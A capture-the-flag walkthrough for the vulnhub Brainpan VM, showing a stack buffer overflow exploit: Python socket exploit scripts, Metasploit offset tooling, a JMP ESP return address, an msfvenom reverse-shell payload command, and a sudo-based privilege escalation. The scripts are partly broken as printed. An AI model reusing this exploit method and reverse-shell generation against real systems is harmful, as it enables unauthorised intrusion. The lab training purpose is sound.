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If your weak area is buffer overflow exploits then vulnhub’s Brainpan is the vm you need to conquer. This is the vulnhub Brainpan walkthrough for Kali Linux.

Want to setup a home pentesting lab to practice your ethical hacking skills? I spell out how it’s done in the 10 easy steps post.

Here’s What You Need:

  • Brainpan from vulnhub.
  • Kali Linux Virtual Machine (VirtualBox)
  • Client Virtual Machine with Immunity Debugger (VirtualBox)

Why Bother with Buffer Overflows?

There comes a time when the only attack surface of a target is a vulnerable application. In that case it is possible to exploit the application itself.

Buffer Overflow

Basically the logic is:

  • Overflow to find the number of bytes needed to overflow the buffer.
  • Find the exact location of the overwritten instruction pointer.
  • Send enough bytes to reach the instruction pointer then use a JMP ESP address to overwrite it with instructing the program to execute at the location of the shell code.
  • Send exploit and get a shell back.

Information Gathering

To get a listing of the hidden directories found in Brainpan I run dirb, dirb which reveals the bin directory.

Running the Windows program with wine reveals some helpful details. The port looks familiar. This is obviously the application itself that is funning on <brainpan>:9999. So I will grab it and throw it in Immunity Debugger to start crafting an exploit.

root@kali:~/brainpan# wine brainpan.exe  
[+] initializing winsock...done. 
[+] server socket created. 
[+] bind done on port 9999 
[+] waiting for connections. 

Fuzzing the Vulnerable Program

The vulnerable application is hosted on the Brainpan vm.

root@kali:~/brainpan# /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 1000 

Now I plug in the pattern as the buffer and send it on its way.

import socket 
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM) 

buffer = "pattern"

   print "sending attack buffer" 
   s.connect(('brainpain ip', 9999)) 
   data =s.recv(1024) 
   s.send(buffer + '\r\n') 
   data = s.recv(1024) 
   print "\n done." 
   print "ERROR!" 
The EIP register is successfully overwritten with the bytes of my pattern.
root@kali:~/brainpan# /usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -l 1000 -q 35724134 
[*] Exact match at offset 524 

The exact number of “B”s to send in the attack buffer took some guessing. To recap the “B”s are merely a test sequence for the buffer to test how adding in the JMP ESP return addresss will affect the exploit. If the EIP register is overwritten by the “C”s then I know it is working. I can then replace them with shellcode. This took some testing. It was somewhere between 4-10 bytes.

import socket 
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM) 

# 524 is the offset remember 
pattern = "A"*524 

# found this using a search for jmp esp
return_address = '\x53\x93\x42\x7E' 

#c="C"*472 #1000-524-4 

nops = '\x90'*10 

#buffer = pattern + return_address + nops + shellcode 

   print "sending attack buffer" 
   s.connect(('brainpain ip', 9999)) 
   data =s.recv(1024) 
   s.send(buffer + '\r\n') 
   data = s.recv(1024) 
   print "\n done." 
   print "ERROR!" 

Now I need to generate some shellcode for a reverse shell for a linux target. The “\x00” parameter means don’t include any null bytes as these may disrupt the exploit.

root@kali:~/brainpan# msfvenom -p linux/x86/shell_reverse_tcp LHOST= LPORT=4444 EXITFUNC=thread –e x86/alpha_upper –b “\x00” -f c 

Running the Linux shellcode now returns the shell to me from the Brainpan machine.

Linux Privilege Escalation

From here I want to get a better shell so I will run a command to get a TTY shell via Python. (Teletypewriter shell)

python -c "import pty; pty.spawn('/bin/sh')

Next I will use a common technique of seeing which commands have root-level privilege already and run them myself to escalate.

sudo -l 

By running the command I list out the commands my current user can run with root privileges, and now have root!
